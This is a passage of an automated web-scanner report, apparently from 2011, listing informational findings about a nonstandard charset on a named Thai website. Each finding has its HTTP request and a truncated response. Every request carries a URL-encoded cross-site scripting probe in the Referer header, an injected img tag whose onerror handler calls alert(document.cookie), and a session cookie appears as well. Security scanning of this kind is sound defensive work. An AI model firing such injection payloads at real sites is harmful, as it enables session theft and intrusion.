Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29476

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.48. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_head1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bg_head1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.49. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu01.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bg_mmenu01.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.50. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu02.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bg_mmenu02.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.51. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_search1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bg_search1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:08 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.52. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_about1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bt_about1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:59 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.53. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_agent1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bt_agent1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.54. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_education_center1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bt_education_center1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29490

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.55. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_home2.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bt_home2.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.56. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_news1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bt_news1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.57. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_service1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/bt_service1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29481

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.58. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/cmd_search1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/cmd_search1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29481

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.59. http://www.ktam.co.th/en/index.php/ims/empty.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/empty.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/empty.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.60. http://www.ktam.co.th/en/index.php/ims/h_download1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_download1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/h_download1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29481

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.61. http://www.ktam.co.th/en/index.php/ims/h_link1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_link1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/h_link1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:44 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.62. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_acrobat.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/i_acrobat.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:48 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.63. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_firefox.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/i_firefox.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:49 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
